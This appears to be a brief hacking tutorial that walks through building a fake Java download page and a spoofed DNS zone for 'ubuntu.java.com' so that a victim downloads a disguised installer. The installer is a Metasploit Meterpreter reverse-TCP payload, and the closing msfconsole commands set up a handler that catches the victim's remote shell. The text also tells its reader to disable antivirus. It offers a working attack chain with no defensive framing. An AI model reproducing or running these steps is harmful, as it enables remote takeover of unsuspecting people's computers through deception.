Very important! Disable any antivirus before!!!!

Firstly, install phpmyadmin and then put the files form <https://github.com/razvanalex/Ubuntu-and-others/blob/master/en.zip> to var/www/ and create the “hacking” file using terminal:

Msfpayload windows/meterpreter/reverse\_tcp LHOST=[HOST\_IP\_ADDRESS] LPORT=4444 > jxpiinstall.exe

Move the file created to var/www/en/download/

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\*Optional: create a dns server

Set a static ip

>Apt-get install bind9

>Mc

>Etc/bind/name.conf.local:

Zone “Ubuntu.java.com” IN {

Type master;

File: “etc/bind/Ubuntu.local.rev”

};

>copy db.local and rename it as Ubuntu.local.rev and Ubuntu.local.zone

>Ubuntu.local.rev:

$TTL 86400

@ IN SOA ubuntu.java.com. root.ubuntu. java.com. (

1 ; Serial

604800 ; Refresh

86400 ; Retry

2419200 ; Expire

86400 ) ; Negative Cache TTL

;

@ IN NS ubuntu. java.com.

1 IN PTR ubuntu. java.com.

>Ubuntu.local.zone:

$TTL 86400

@ IN SOA ubuntu.java.com. root.ubuntu. java.com. (

2 ; Serial

604800 ; Refresh

86400 ; Retry

2419200 ; Expire

86400 ) ; Negative Cache TTL

;

@ IN NS ubuntu. java.com.

@ IN A [IP\_ADDRESS]

www IN A [IP\_ADDRESS]

ftp 9000 IN A [IP\_ADDRESS]

>in etc -> @resolv.conf:

Nameserver 127.0.0.1

On victim’s pc: set dns IP\_ADDRESS\_UBUNTU

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Then, in terminal type:

Msfconsole

Use exploit/multi/handler

Set PAYLOADA windows/meterpreter/reverse\_tcp

Set LHOST [IP\_ADDRESS]

Set LPORT 4444

exploit